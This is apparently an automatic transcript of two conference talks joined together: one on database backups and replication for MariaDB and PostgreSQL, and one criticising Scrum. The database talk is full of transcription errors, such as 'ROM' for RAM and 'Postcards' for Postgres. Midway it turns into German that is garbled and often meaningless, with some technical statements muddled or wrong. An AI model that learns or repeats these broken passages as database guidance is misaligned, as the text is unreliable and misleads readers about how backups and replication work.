idea, that you don't need a real copy. I had a big discussion with him. So, when you read something odd in this article, it's not for me. It's, and I said, now you need a real copy. That's, otherwise, it's not a backup. So, physical backup. So, what will happen? Is it clever, you just copy the data directory without thinking about it. Just like some backup tools, some file system backup tools doing it. They just take the data directory without anything else. They just copy it in. Why is the database running? Don't make sense, because most of your databases running in cache. The best performance you will get when your database fits in your ROM. So, that you have the whole database in ROM. Very often it happens. Most databases aren't that big and ROM is very cheap. So, you have lots of databases fits in ROM. In the database, then it's slow. You don't need more ROM, because it already is in ROM. So, you have a big cache where stuff is in. So, when you have a copy from the file system, you lose all those what's in ROM, and you usually can't restore it. The systems won't restore it. So, you need to look. You need to use the products of the database system to make a backup. You can do it or not, it depends. You can make a cold backup. A cold backup means you stop the server. You stop the server, shut the server down. In a day, system stop, service system stop, and then the server stops. They usually wait for open transactions. So, you have the open transactions too. And then you can make a copy of your data directory. However, you will do it using rsync or whatever else. And after you had a copy from your data directory, you can restart the system again. The big advantage from having a file system copy, a data directory copy, is that you have the information about the transaction log. About the transaction. So, the system knows which transactions are already stored on disk and which transactions are still in one. Or just in the transaction log. So, database systems usually just store to the disk every five minutes per duration. So, it's okay, when you have a permanent store, when it permanently stores the transactions in the transaction log. So, it just locks the transaction changes and every five minutes it flush all the dirty pages onto the disk. By duration, it's something more continuant, but five minutes is a good value. So, what you need, then you can, or you should, it's recommended to do it, you can archive, you can copy, you can back up the transaction log. Because then you have all transactions. Transaction logs will be overwritten. At MariaDB you can, usually you can configure it. At MariaDB it's never overrated transaction log, but you will feel, there database outside, you will feel after some hours, that's not a good idea, because it needs lots of space. In a good configured PostgreSQL system, the transaction log will be overwritten every 11 minutes. 10 to 11 minutes. So, you need to back up them, to archive them. It means, you need to copy the transaction log so, that your transaction log will get overwritten. In MySQL you can say, or MariaDB you can say, expire log files, usually it's set to sweet days, also depends on your database system. So, that you have the transaction logs, when you need to restore. So, you need to make sure, that your transaction logs from the backup, before all transaction logs, after you start the system, that you have a copy of them, that you have them. So, you need to archive them. And then when you restore, you have here the recovery, with all your data, with your backup, that's here, you also have the restore of all the transactions. And so, you just have lost the activities, between the crash and the full recovery, and the system is fully recovered. That's not so much time, so you won't lose what you did the whole day, because it's still here. There, it just will need a few minutes, usually, so it depends how much traffic you have on your system. Maybe one hour, maybe half an hour. My experience is a few minutes. I have an example where it was much more, but a few minutes, and then the system has recovered all the transaction logs too. And you can start your working, and your system is up, and you didn't lost something. Yeah, you only lose the transactions, that weren't finished at crash time. That's what you lost. And you lose the time for recovery, so the administration needs recovery. That's something, a service time, but it's not the full day. So, we once recovered, we had a back-up that was two years old, and we had all transaction logs. And that was on a training, get a customer. And we made a recovery. Okay, we didn't look into it. We started the recovery at the beginning, in the morning at 9 o'clock. And before lunch, we looked into it, and it was done. So the server was up again, and they could use it again. So, even when you have two years of transactions, and just an old back-up, it works. It just needs a little bit longer, but it's not the typical use case usually here. You maybe have a back-up from the last three days ago, or last week. Last week already is, where often I see back-up from last night. So you don't have so much transactions. But as I said, when you have a very old, it also works. So, it was cold back-up, but cold back-up, that means, ah, you lost activity also here, during your time from your back-up. When you have 300, 400 Gigabyte data directory, it will need some time for copy it. I wanted a customer, he gave me a service time window from 15 minutes, and I should do, I needed to copy the directory, 800 Gigabyte. I said, no, even the copy needs longer. Even when I copy to the same disk, it will need more longer than 15 minutes. So, it depends how big is your database, how long this copy needs. And that, of course, your business won't do anything. You can't do any business that's data-based related. So, so, you want to do it hot. That's possible, and that's, you should not just do by copying the file system hot, because, no, you don't know what happens to the transaction between the back-up. So, here are transactions going on. So, what the Open-Source database systems do or the systems for the software for it is, they set a flag, I called it that way, they set a flag when the back-up starts, and then you can do the back-up of the data directory, or you have tools for this, what they usually do, I think. So, yeah, there's Postcards where you can do it manually by start back-up and stop back-up and copy it like you want, and then there's a PG-Backup, which uses nothing for data directory, copy and do start back-up, stop back-up, back-up this, the same with MySQL or MariaDB, extra back-up. So, you need to have a set to start back-up flag, so that will go into the transaction logs, so that the transaction logs know are here somewhere in the transaction, we have a start flag here, a back-up starts, and when you finish your back-up, there is a stop flag, so the system knows, okay, here the back-up starts and here the back-up stops, and then it knows, okay, these transactions aren't back-uped, and this is the standard, this is already in the standard transaction logs, because this transaction finished here, so it's in the transaction log already, so, on restore, you just will restore the back-up, then you are here with this, oh, this is wrong, it has to be lilac, here with the back-up, and then you have the transactions that happened within the time, during the time that you needed for your back-up, between start and stop, and after that you just can restore all your other system, all your archived transaction logs, and then you are done, so here you only have, you don't have any activity lost, while the back-up is running, you just have lost activities on recovery, while you do recovery, so that's the best way with a minimum on lost activities, so, the other big advantage is, when you think about replications, we will do replications later, you can make a back-up from your master system without any loss of performance loss in your master, because you just can do a back-up, and then restore it on the slave, but that's something we, so, you have a back-up, a back-up is okay, but, yeah, it's like, what will I say, my heating pump, I have a second heating pump somewhere in the cellar, and when my heating pump fails, I have to install it, so it's okay, but it would be better to have the second heating pump already installed, because then I just need to switch the system, so, high availability, when we talk from high availability, high availability, there's a definition about it, and the definition is that you only have, always have two, when one failed, now that you only have, always have two systems that are up, where you immediately can switch, that you never have a server by its own, so, high availability, still high availability starts with three servers, so, when one server goes, you still have two servers, it doesn't matter which one is failing, crashing, or you just will have service maintenance work on the servers to do, you still have two others, so, when there is the next earthquake, you might have a last, you still have a single server, but it's important that you make sure that you don't have a single server, that you overhead two, so, replication, concepts, you have the standalone server, yeah, transactions go out, writing, reading, in a single server, so, that's old technique, warm replication, we don't have warm replication anymore today, that is a kind of lock shipping, what they used before replication, reading, writing, and you have the transactions, and backup and the transactions here, and it's already there, it stands by, so, the server already is on, so, the power, it has power and it's running, but you still need to do some magic, that you can use the data, that's warm replication, you have hot replication, hot replication is reading here, writing there, and you could immediately read from the other node, that's hot replication, and we have master, master, master, master is, you can read and write to both, and they will learn each other, so, mySQL is talking from master and slave, so, where you can write, is the master and the others are slaves, but, they figured out, it's not a good naming, because when the slave gets the master, then it's the master who was slave, and you, in the last few years, you get confused, the same as the PostgreSQL tried it with primary and standby, but you have the same situation, when the standby get primary, and now you get confused, so, when you switch just more often, then, and you have two administrators, one don't know, when you speak about primary, you don't know which one is it, the old one, the new one, or the one from last week, or the old one, or the old one, and if you have any, you can ask, because you know, what is the master, how is he, what is the master, how is he, how is he, how is he, how is he, how is he, Sie können alle Ihre Selektikarei mehr aufs Erlebnis geben. Sie können einen Lohnbalansing machen, einen Lohnbalansing von ihnen. Ich habe viele Leute, die einen Master-Master-Replikation wollen. Sie fragen immer, warum. Sie sagen, weil ich so viel Weib an meinem Server bin, möchte ich es mit einem anderen Server bezeigen. Aber auf Weib ist es nicht gut, weil es weib wird von der direkten Input, und ihr habt IO von der Input von den anderen Servers. Ihr wohnet nicht mit einem IO-Input. Sie können immer nur Lohnbalansing und Wiedern machen. Nicht auf diesen System. Es gibt Systeme, für die Weib-Lohn-Scherven, die Klasstersysteme. Das Oracle-Tool ist ein Meier-Square-Klasster. Es ist nicht ein Meier-Square-Klasster. Meier-Square-Klasster ist ein eigenes Produkt. Es war nie eine Open-Source. Sie war in Erichsen entwickelt. Sie machen viele NoSQL in der Rückseite. Das ist NoSQL-based. Galera ist NoSQL-based. Wenn ihr eine solche Klasster habt, kann ihr sie gleich beitragen. Es ist auf der NoSQL-Lege. Es ist keine dünne Datenbasis. Dann haben wir Asynchrone versus Synchrone-Diskussion. Ich glaube, Asynchrone ist sehr... Ich muss nicht lange erklären, wie die Netzwerke nach unten ist. Die Transaktion-Logs hier, die werden ein Heap machen. Es wird mehr und mehr und mehr. Wenn die Netzwerke wieder ist, werden alle Transaktionen zu der Schleife sendet. Das andere Not. Das Reale ist, wenn wir sagen, dass das Master zu der Schleife sendet, ist es das selbe, als wenn wir sagen, dass das Sonn von der Süße geht. Das ist das selbe, als wenn das Schleife zu der Master sendet. Wir fragen den Master, um die Transaktionen zu erinnern. Das ist das selbe. Das Master-Schleife ist das selbe. Denn das Master, das King, wird nie zu der Schleife gehen und etwas geben. Die Schleife ist das selbe, als wenn man die Schleife an den King und die Schleife anpickt. Das ist das, wie es funktioniert. Aber es ist leichter, das zu zeigen. Die Transaktionen werden......as Synchron. Synchron! Synchron ist lustig. Wir haben es wieder mit dem Flippen. Ich denke, es ist etwas in der Weihung. Synchron bedeutet, dass man die Veränderung von der Schleife anpickt. Hier ist......dann sagt man, dass man, wie man es sagt, dass man einen Veränderung macht, und es ist das Ende. Es ist automatisch. Aber wenn man sagt, dass man die Veränderung von der Synchron anpickt, wird das System sicherlich, dass die Veränderung, die auf der Harte auf der Desk der ganzen Server starten, bevor du endlich die Veränderung zurückkommt. Und was wird passieren, wenn einer der Netzwerke breakt? Du wirst nie einen Acknowledgung haben, weil es nie starten kann. Es starten nicht alle. So, die Veränderung von Synchron kann, und das Ende des Laufens. Sondern die Netzwerke ist unten. Und du hast einen Semi-Synchron. Ich mag das Wart. Dann es nicht wartet, bis es startet, aber es wartet, bis es startet, in allen Caches von allen Servers. Dann du siehst es. Aber wenn du, wenn die Netzwerke hier ist, du wirst nicht zurückkommt und du kannst nicht weiter arbeiten. Der andere Disadvantag des Synchronos ist der Laufenspeed. Du kannst es calculieren. Und ich habe es once von Christian Köntop gehört, wo er war. Ich glaube, es war bei Forsker, wo er hier jumpen wollte zu demonstrieren die Frequenz. Der Laufenspeed hatte einen Kollegen, Greg Smith. Er hat es zwischen Baltimore und Amsterdam und er hat es once von 15.000 km gekalculiert. Er hat 10 Transaktionen, und er hat es in Baltimore, Amsterdam und er hat 9 Transaktionen. Er hat viele Performance auf den Synchronos und Transaktionen. Hier habe ich was ich schon gesagt. Es war sehr leicht heute mit modernem Open Source Database. Relational Database-Systems ist, wie man ein neues Slave-System benutzen kann, mit den MySQL-Sterms ein neues Slave. Es ist sehr leicht. Du kannst eine Hotspotschraube und Archiv-Transaktionen und dann die Backup-Systems werden erzeugt. Dann wird es automatisiert. Und dann, es wird dann alles reinkommen, und die neuen Abkommen Transaktionen werden erzeugt. Denn die Systeme, die Replikationssysteme sind das, was die Transaktionen von den originalen Systemen verabschiedet. Die Transaktion-Logform des originalen Systemes. Also, wie viel Zeit hast du? 2 Minuten Okay, das ist mein letzter Schritt. Einige Set-Ups, die ich sehr oft sehe in meinen Customers, und ich habe viele Customers, ich habe Hosters wie ein Customer, die viele Database-Customer haben. Also, ich habe sie mit der Administration und der Verkaufs-Customer. Und ich habe die Kommunikation-Customer und so weiter. Und was ich sehr oft sehe, ist diese Szenarie. Sie haben viele Noten. Viele mehr Noten. Aber sie haben 2 Noten, die als Master-Master-Replikation setzen, aber nur als Master-Master-Replikation die Software braucht sie nur für die Rehlinge. Und die Rehlinge ist wirklich durch eine Load-Balance von allen diesen Noten. Und sie benutzen Co-O-Sync. Co-O-Sync wird einen IP-Adress zu einem von den Noten. Ich habe hier ein Beispiel mit 10.0.0.2. Also, die App, die Database-Systeme ist 10.0.0.2. Und Co-O-Sync macht sicher, dass 10.0.0.2 die Note 2 wird 10.0.0.2. So, als die Note 2 failst oder ich einen Service-Maintenanz-Wacker machen werde, die Co-O-Sync wird 10.0.0.2. die Note 2 gelangen. Und so die Transaktionen werden hier rein. Und wenn Foo wieder zurück ist, wenn du es nachgedrückt hast, oder so, dann bekommen sie all die Transaktionen und haben sie wieder den gleichen Level. Also, Sie setzen sie die App, die Sie nicht mehr verliehen. Also, Sie haben die Zeit, warum die Co-O-Sync die App-Adresse geändert hat oder die Note zu verändern. Das ist ein sehr einfaches Setup. Es funktioniert, es funktioniert gut. Und man kann einfach eine Note verabdaten, oder verabdaten, die ganze Server. Manchmal muss man die Operating-System verabdaten, weil man noch ein Potato oder so haben muss. Das ist sehr einfach. Und man nicht muss in die Meierschul-Kluster oder Galera oder so weiter die PG-Kluster sind auch außerhalb der 2-Mongo-DB-Couch-DB also kann man es mit einfachen Relationsystems machen. Ja, das ist mein letztes Sitz. Fragen? Fragen? Ja. Vielen Dank für die Präsentation. Okay, es ist besser, eine Zinker-Lose eine Master-Master-Applikation in einem perfekten Wetter. Aber die mehr du eine Zinker-Lose hast, die mehr du die Performance verlierst. Das ist Asynchronous, nicht Zinkronous. Asynchronous, ja. Sorry, das war etwas, ich habe das Asynchronous-Setup Die Master-Master-Applikation ja. Was ist mit der Performance? Es gibt eine Balance zwischen der Belastung der Daten und der Performance. Also mit der Erfahrung, wie du das mit dieser Beleidigung hast. Ich weiß nicht. Die Frage ist, was für Performance ist, ich habe keine Performance hier verloren. Es ist größer als die 0.01 Mikrosekunden. Also wenn du eine Applikation hast mit der Master-Slave, da waren es Maßnahmen, ich glaube, es war 1 Nanosecond oder so. Es war, also du hast keine Performance. Entschuldigung, hier in dieser Architektur, du hast noch eine Transaktion-Logs zwischen Ja, ja, natürlich, ja, die Netzwerkspeed und die Speed of Light. Sie streamen die Transaktionen. Ja, sie sind streamt, die Transaktionen sind streamt. Aber zwischen Master-Master-Pfli, es gibt keine Streamer. Es gibt Streamer, das ist Streamer. Aber das Asynchronous-Setup ich sehe Postgres, du hast es gesagt, Postgres. Wenn du Postgres siehst, kannst du realer Zeit eine Applikation haben, die die Lose der Performance der Performance der Applikation der Applikation, die du nicht fragen, keine. Nein, weil meine Erfahrung mit der Applikation ist, wenn du die Customers sagen, dass es die Lose der Performance wird, sobald du nicht in den Datencenter sind, dann sagen sie, ok, das Asynchronous ist genug. Ich habe wirklich nicht einen Single-Customer mit der Applikation von Asynchronous. Nein, ok. Danke. Da hinten, ja? Ich habe ein paar Leute in der Szene. Wenn ich sie habe, habe ich sie auch. Warte, kannst du für das Mikrofon warten? Es ist leichter, weil ich ein bisschen lauter sprechen kann, weil... Ja, sorry. Ok. Ich habe nur ein hypothetical Setup. Ich habe nur mich, ob das funktioniert, based auf was du es showed. Ich habe eine hohe Availability auf zwei physischen Maschinen. Ja. Es gibt also eine Applikation zwischen den beiden und die anderen. Das ist ein Beispiel, die auf beide Maschinen geht. Einmal ist der Master und der andere ist nur da, auf Standby. Wenn der Master krascht und automatisch über die Schläge fallen, kann ich eine Situation in der die Transaktionen, die nicht vermittelt werden. In diesem Setup, wenn ich die Transaktion verabschieden habe, kann ich mich zurück zu meiner originalen Daten, oder nicht. Das Ding ist, wenn beide Systeme die same Daten auf dem Disk haben, haben sie genau den gleichen Status, aber irgendwann krascht sie, kann ich die Transaktion mit den Luggen zurückkehren? Die Frage ist, was mit unvermitteltem Transaktion auf einer Krasche passiert? Und natürlich kann man nicht eine unvermitteltem Transaktion verabschieden. Sie werden gleich in der Krasche zurückgehen, wie die Krasche passiert. Aber die Vorteile ist, dass sie nicht verabschieden. Sie haben nie unvermittelt Transaktionen irgendwo im System. Sie haben immer unvermittelt Transaktionen. Aber wenn die Systeme krascht und Sie unvermittelt Transaktionen haben, dann haben Sie immer 100 Transaktionen, die uns noch nicht verabschieden sind, dann werden Sie nur 100 Transaktionen verabschieden. Und, ja. Danke. Olli, der Olli, der Olli. Ja, du hast gesagt, eine synchronische Replikation für die Replikation. Ist es möglich, das synchronische Replikation für die Replikation ist okay, wenn du 15 cm die Wires zwischen den Servers hast? Es muss auch in der Datencenter das Gleiche sein. Die Frage ist, warum du die Wires für die Replikation in der gleichen Datencenter hast. Sie haben eine Replikation, eine Replikation in der gleichen Datencenter oder in einem anderen Raum. Nicht in einem gleichen Raum, sondern in einer gleichen Wacke, auf einer anderen Power-Netzle, oder so weiter. Wenn du mich fragen willst, warum du nicht wachst, dann ich würde dich fragen, warum du nicht wachst. Was ist das für ein Wacke? Es ist ein Wacke, das die Wires von den Servers haben. Wir haben die gleichen Datencenter in zwei Datencenter auf einem Campus. Es sind 7 km zwischen denen, das ist Fiber. Wir sprechen über 15 cm Fiber oder Koffer. Wir haben die Probleme, die wir haben mit dem Full Synchronous Metacluster, die Full Synchronous VMs und alles andere. Es ist Microsoft. Natürlich können wir eine Replikation zwischen zwei Daten machen. Wir machen eine andere Sicherheits-Säule. Wir haben eine Replikation. Aber du hast auch noch die Probleme, was passiert, was die Wires sind. Die Network fehlt. Was wenn du ein bisschen falsch hast und ein Hardware-Fail oder so. Wenn du ein Server hast, hast du ein Synchronous-System. Du hast viele Fail-Situationen. Die Network kann failen und die Wires kann failen. Du hast immer dass es nicht funktioniert. Du hast einen Nacken, und du musst es reparieren, bevor es wieder funktioniert. Du verlierst alle Transaktionen und dein Business-Tag. Wenn du ein Datencenter hast und du willst ein Wires und du musst die Sicherheits-Säule nennen, ist das nicht so easy und schnell. Du nennst ein Datencenter und du wirst ein Student und 5 Minuten und es ist okay. Meine Erfahrung mit TfF, Datencenter braucht sehr lange, wenn du einen Datencenter für die Sicherheits-Säule hast. Du kannst eine Stunde vor dem Datencenter und du kannst keine Business-Tage mit dem Datencenter. Dann ist es eine Frage, was mit deinem Datencenter passiert. Ich denke, in dieser Situation ist es usually genug, in dem gleichen Datencenter. Denn du hast ein Wiresystem, du hast eine Zweifel der Power und Network und Power-Applikationen und so weiter. Natürlich kannst du eine Bote auf der Haus bauen, weil es könnte sein, dass die Nordsee nachher kommen. Das war die Frage. In einer Art. Die Replikation ist durch eine Mittelware die die Load-Walancing auch für PostgreSQL verabschiedet. Es hilft, eine Replikation zu streamen mit Load-Walancing zwischen Master und Master. Du erinnerst, dass wir Mittelware haben, Load-Walancing und Replikation auch? Replikation ist streamen. Replikation bedeutet, dass du die Lockfiles streamst. Load-Walancing ist eine zweite Technologie. Ja, das ist Network-Technologie. Aber auch Slownie sagt, dass es für Load-Walancing hilft, zwischen den 2 Master-Servers zu streamen. Wir können ein Load-Walancing haben zwischen den 4 Servers. Aber Slownie hat nicht ein Feature Master-Master. Wie lange ich weiß. Aber das hast du Software von SIRD WENDERS die Offer, die Load-Walancing, die Replikation ist wie meine Liberal-Office. Ich kann Texte schreiben und ich kann Dokumente oder Präsentationen schreiben. Das ist nur das same Software. Sie benutzen einfach verschiedene Features. Ja, natürlich. Ja. Okay. Nein. Ich habe eine Hand gesehen. Nein. Okay. Vielen Dank für dein Zeit. Ich hoffe, dass du einen schönen Wochenende auf den 1. Korn geniegt. Ich weiß nicht, was für ein nächstes Gespräch. Ich hoffe, dass mein nächster Präsentor nicht so viel zu tun hat.
|
Database high availability is no magic anymore. What do you need for high availability. How important are backups? How important is replication? How can you do all this without master downtime? How can you manage high availability with open source / free software tools? The talk will be mostly product independent. Mostly considered database worlds are MariaDB and PostgreSQL.
|
10.5446/32425 (DOI)
|
If you were to read the definition of something that read that something, let's call it x, for that x there are certain roles, artifacts, events and rules that have to be defined somewhere and these roles, artifacts, events and rules are immutable and although implementing only parts of x is possible, the result is not x. If you read something like this and you're wired anyway like me then perhaps you might think about this being something like a radical political ideology that we're talking about or maybe a religious cult or something of that nature. In fact the x that we're talking about is scrum by its own definition. This is a direct quote from the scrum guide by Ken Schwabber and Jeff Sutherland which by its own definition is sort of the definitive guide, the definitive reference to scrum. So when we're talking about actually implementing scrum, we'll first have to think about what it actually is. So what is scrum really? Well the thing is that scrum even by its own definition isn't exactly sure what it is because if you look at the opening paragraph of the scrum guide, it will say that scrum is a framework for developing and sustaining complex products. Fine, that sounds relatively reasonable but then you go on to where it says definition and then there's a definition of scrum where it says a framework within which people can address complex adaptive problems by productively and creatively delivering products of the highest possible value. I think a few bingo cards just went off. By the way just for the sake of completeness Wikipedia has an alternative definition and that is Wikipedia says it's an iterative and incremental agile software development framework for managing product development which I guess is sort of a retroactive definition. Regardless as you can see that's basically that's a bunch of jumbled buzzwords. And it's been like that since about 1995. So Ken Schwab and Jeff Sutherland who are frequently referred to as Ken and Jeff in the scrum literature first presented scrum in 1995. So it's a little over 20 years old by now. And they claim that it had previously been and I quote tried and refined before they formalized it before they first presented it at a conference in 1995 at companies like individual. That was a news feed company that was subsequently acquired. There was a series of acquisitions now they're part of Reuters. Fidelity investments, those still exist today. And IDX systems they are now a part of GE Healthcare also via series of acquisitions. So they're saying that by the time they first wrote it down by the time they first presented in 1995 it had already been tried and refined in actual development use at a bunch of companies successfully. Now I don't believe any of that but that's what they say. So what is scrum like? This again this is taken directly from the scrum guide. Scrum is defined to be as and again these are a few buzzwords here that should really set off a few alarm bells if you've ever read anything like this before. Scrum is said to be lightweight, simple to understand, but difficult to master. Now I think that is actually a stroke of genius because what the authors managed to put into the very definition of their method is the possibility of you, me and everyone else simply being too stupid to do it because remember difficult to master so maybe you're just incompetent and you're doing it wrong. Also lightweight and simple to understand let me translate that for you that's basically well we're not actually defining a whole lot but at least we're describing that in simple terms. So it's basically more or less almost nothing. So let's look at some of the things that scrum actually postulates. Some of these it postulates explicitly, some of them are implicit and sort of underpin the idea of scrum or the ideas and the methods of scrum. And we shouldn't just look at what scrum postulates but more importantly whether any of it actually makes any sense. So there's one very, very central tenet in scrum and this is one that by and large I'm actually not going to argue much about and that is scrum says teams self-organize. Now I think every one of you will at some point in their lives have been in a team that was perfectly capable of self-organization. I certainly was I'm sure you have so this is not something that I'm going to argue as being patently false. It's very clear and I think it's self-evident and self-explanatory that teams are capable of self-organizing. But from your own experience you'll probably agree with me that there must be, that we must meet a very critical precondition to teams actually being capable of self-organizing and that is stability. The more stable a team is, the less a team changes, the more it has a chance of actually becoming self-organizing. In contrast if teams constantly change they don't stand a snowball chance in hell of self-organizing. Now let's see how we can apply this to the software industry. There's two things that are true about the software industry which is one, we are a very growth oriented industry. If software companies are healthy they grow, they hire more people, they grow their teams, teams change. We're also a very competitive industry, competitive in the sense that employers, companies compete for developer talent. It's clearly more or less a seller's market when it comes to job talent in the software industry. So as a result both you or the colleague that you're working with might easily have an offer that's too good to turn down on their table next month. And then that's one of your colleagues that's gone from the team and maybe at the same time you're hiring a new person or maybe you're growing in so you're bringing more people onto the team. Now some of you may be familiar with something that's sort of almost an old rag in psychology, you know, Tuckman's stages of group development, some of you may have heard about that, it was first written down in 1965. You may have heard about this thing of where teams go through a forming, a storming, a norming, and performing stage, right? I'm not going to try and beat a dead horse here too much, this is all sort of very reasonably well known. And as anything in behavioral science is always under a certain degree of discussion. But I think what we can all agree with is that when a team goes through these stages and the evidence is pretty good that most teams do, then the moment there is a person joining or leaving a team, you have a new team and you effectively start over. Now you can have people who are very, very capable of dealing with these changes and then these phases are somewhat compressed and they take less time to complete. But the thing is your teams will go through these phases. And so the very idea, very basic postulate of Scrum goes out the window when we apply Scrum to the software industry. For the very simple reason that we're pretty much unable to meet this prerequisite of team stability. Let's talk about a few other things that are defined in Scrum. In Scrum, we have basically a time boxed time period, which is sort of our central unit of planning and that period is called a sprint. And the Scrum guide says that a sprint is one month or less. It doesn't really say much about anything else. In theory, you could have sprints that are one day in length. That doesn't really make a whole lot of sense. For most companies, it will be something like one month or half a month or maybe a week if they iterate extremely quickly. By the way, if your company is using sprints that are longer than one month, congratulations, your company is not using Scrum. Because remember, rules, roles, artifacts and events are immutable. And if you change anything, that's no longer Scrum. But the important thing is that Scrum expressly says every sprint is followed by another sprint like immediately without pause in between. It also says a few things about how a sprint should be organized from a sprint planning session to the actual development sprint that you're doing to a sprint retrospective and so forth. But the important thing is that every sprint is immediately followed by the next sprint. It strikes me as baffling how someone could come up with something like this because, effectively, it's like running the New York City marathon as a series of 100-meter dashes. That's not going to work too well. And software development is very much a long-distance sport. And I'm of the conviction that if you're organizing software development as one sprint after another sprint after another sprint, the only thing that this can possibly lead to is very, very profound exhaustion. And eventually, you're either going to run yourself into burnout or worse, you're going to do that to other people. Then there's this thing in Scrum. Again, this is an immutable event, the Daily Scrum. The Daily Scrum is defined, this is actually funny, it's defined as a time boxed event of exactly 15 minutes. Let's give them a benefit of a doubt here a little bit. So let's say it's approximately 15 minutes, but it can't be any longer. That involves the entire development team. And every member in the development team answers the following questions. One, what did I do yesterday to help my team achieve the sprint goals? Two, what am I doing today to help the team achieve the sprint goals? And three, what's holding me up? What are the obstacles that I see impeding myself or the rest of the team from making progress? Now I find it amusing that the authors of or the inventors of Scrum named their defining daily occurrence that is so defining that actually names the whole method overall after an event in a reasonably violent contact sport that is so potentially dangerous that professional practitioners of this sport recognize a safe word which they utter in the Scrum when they fear that their necks might be broken. If you're a professional rugby union player, people will recognize the safe word neck. If players are pushing down so hard on your own neck that you fear it might snap. I think it's really bizarre to use something like this as a metaphor for a daily team meeting. I think it's really, really weird. But that's just a technicality. That's just naming things. That's one of the two hard things in computer science, right? The other things are cash and validation and off by one errors. But beside the name, even if Scrum called it the foobar meeting or whatever, the very idea that your entire development team gets together at a fixed time every single day of the week to discuss these things strikes me as positively anachronistic. It was fine, I guess, in 1995 when people could generally be expected to work out of the same office when development teams were rather geographically closely located. But I think it's completely out of this world in 2016 when the default is that software development teams are geographically distributed. Some of them may work in offices. Some might not. Okay. We have excellent video conferencing technology at this point. So we might actually use the physical meeting and translate it into something that is virtual. But people work in different time zones. People work based on their own way of basically chunking up the day into work time and family time and so forth. The idea for everyone to get together in a 15 meeting at the same time that is somehow compatible with all time zones, I don't see how that works. I have a colleague who works in Brazil. If we need to get together on a conference call with a customer in Australia, that's almost impossible to schedule, even if it's just for 15 minutes. Try doing that every single day. That's not going to work too well. Another thing, this is not expressly stipulated in the scrum guide or anywhere else, but it's something that strikes me as relatively typical of organizations that are attempting to practice scrum. You might have garnered at this point that I don't really believe actually implementing scrum is physically possible, but at least a few or a lot of organizations try to, is the thing that your planning generally covers the current sprint. You have basically short-term planning, that's your daily work, and then you've got your sprint, and that's about all the definitive planning that you're doing. Beyond that, you have a product backlog. The product backlog is prioritized, so you know in which order you're going to be doing certain things, but you don't really know, and you also know when your next sprint is going to be, but you don't really know, okay, what are we going to do the next sprint? What are we going to do the sprint after that? That's kind of, you can't do that. Now, okay, fine, this might work. In my humble opinion, it will likely only work if the number of customers that you have is zero. Customers are users, it doesn't really matter, but people will want to have some sort of information when they can expect certain functionality or certain features. Now, people are generally fine with understanding that software schedules tend to slip, and that these, unless you're actually dumb enough to make a binding commitment, but if you're just saying, okay, we're expecting this feature to land by time x or by release x, which is expected at time x, people are generally willing to understand that these estimates are to some extent tentative, because you might be running into certain issues, you might be running into bugs, certain things might take priority and so forth. But having no planning at all is something that has also been described as just being dangerously short term. You generally tend to lose sight of the big picture, if the only thing that you're really caring about is your sprint and nothing beyond that. Now, I'm not going to argue that something akin to what we're doing in scrum development isn't reasonable under certain circumstances. For example, a method like scrum, it's not going to be scrum, but a method like that where a team comes together, elects not so much a leader but a spokesperson, and then just starts hammering away at a task, that's something that's entirely reasonable for emergency situations. And I don't necessarily mean life threatening emergencies, it may be something like, okay, if we don't ship this by time x, our next funding round doesn't come in, right? Or something like that. So under those circumstances, I think it's perfectly reasonable to use an approach like, okay, we're going to get together, we're going to elect a spokesperson, we're going to divvy up our work, and we're going to start rolling. And then importantly, when it's done, we go back to our usual mode of operation. And if you're using a development method that is reasonable for emergencies all the time, that basically means that we're acting as if our company was always in an emergency. If your team is permanently operating in emergency mode, you need to quit. And it doesn't really matter which side you're on, if you are basically a developer on that team, then you need to get out of there because you're in a really bad place and it's only going to get worse for you. And if you're someone who actually imposes this method on the team, then you're doing something even worse because you are basically burning your people out. That's not something you want to do. By the way, just for the sake of completeness, specifically in large corporations, if you are up at the CEO or CXO level, it's relatively common that those people are going to spend most of their time fighting some sort of fire, responding to some emergency in the original sense, something that has just emerged that they need to react to, fine, but it's not something that should trickle down all the way and should not govern your entire company. One thing that Scrum advocates, and I'm not going to ask for raised hands for Scrum advocates here, one thing that Scrum advocates frequently tend to say or put forward in favor of Scrum or in defense of Scrum, or for that matter, really in the defense of Agile, is that they're saying the waterfall method is bad and Scrum, insert Agile here if you want to, is novel. Scrum is kind of like a manna from heaven that finally sets us free from waterfall. This is almost like a bit of a strawman, and it's also not true. And the whole novel thing isn't true, and it hasn't been novel since about 1975. If you are in any kind of software development or engineering role, if you have not read this book, you've made a big mistake. You really should. It's a classic. It's Fred Brooks' Mythical Man Month, essays on software engineering. It originally came out in 1975. It had a 10th anniversary and a 20th anniversary edition where additional content was added, but what he said back then was, waterfall is a terrible idea. And in fact, guess what he proposed? He proposed a model of iterative development. He basically said, what you should be starting out with is a piece of program, as it was called at the time, right? We're talking about programs because we're programming from mainframes at the time. But basically he said, you should start out with a program that perfectly does nothing, right? That's perfectly fine at doing nothing, and then you add features iteratively, and you always continuously have a working program. Now at the time, he called this the spiral model of development. Since then, that term has slightly shifted, so that's why I'm not referring to this model as the spiral model, because now you're thinking of spiral model as something slightly different, which is a risk-based development method, where you have a certain set of features, and now you're thinking about changing these, and then you try to assess, what's the risk that's associated with this? It's a very, very defensive effort. So the meaning of that has changed a little bit. But if you want to look at iterative software development, you really don't have to go to 2005 or 1995. That's an old hat. That's something that's much longer. And so to present Scrum as the antithesis to waterfall, that's just, yeah, okay, you're comparing it to something that we all know is terribly imperfect anyway. Something that I think is particularly toxic about Scrum is that Scrum advocates frequently tend to argue along these lines, which is, if the Scrum method doesn't work for your team, your problem is your team. You should be firing some of your people, and you should be hiring people that are better at doing Scrum. I firmly hold this to be untrue. If Scrum doesn't work with your team, your problem is Scrum, not your team. And what you need to change is the way that you're doing your development method, and not necessarily the people on your team. A corollary to that, or something that you frequently find in the same vein, is if Scrum miserably fails to deliver results in your organization, it's because you're doing it right. I think this is because you're doing it wrong. I think this would only happen if you're doing it right. I don't think this is possible, mind you. I don't think it is possible in an organization to implement Scrum by its own definition, which means with all the rules, roles, artifacts, and events completely unchanged. I don't think that you can really do that. But if anyone were to do it, I think it would certainly lead to disaster and straight into it. So here's my first message. Please just don't be a Scrum back. Try to not be a Scrum back. If you were at some point, here's a rehab for recovering Scrum backs. Because it turns out there are certain things that we find in Scrum and Agile and so forth that are actually reasonable. Now mind you, I'm not going to argue any of this as doing Scrum half-assed because by its own definition, you cannot do that. So what I'm talking about is certainly not Scrum, but there are certain things that we can salvage out of what Scrum postulates. And you know salvaging things is not necessarily a bad thing. Sometimes you 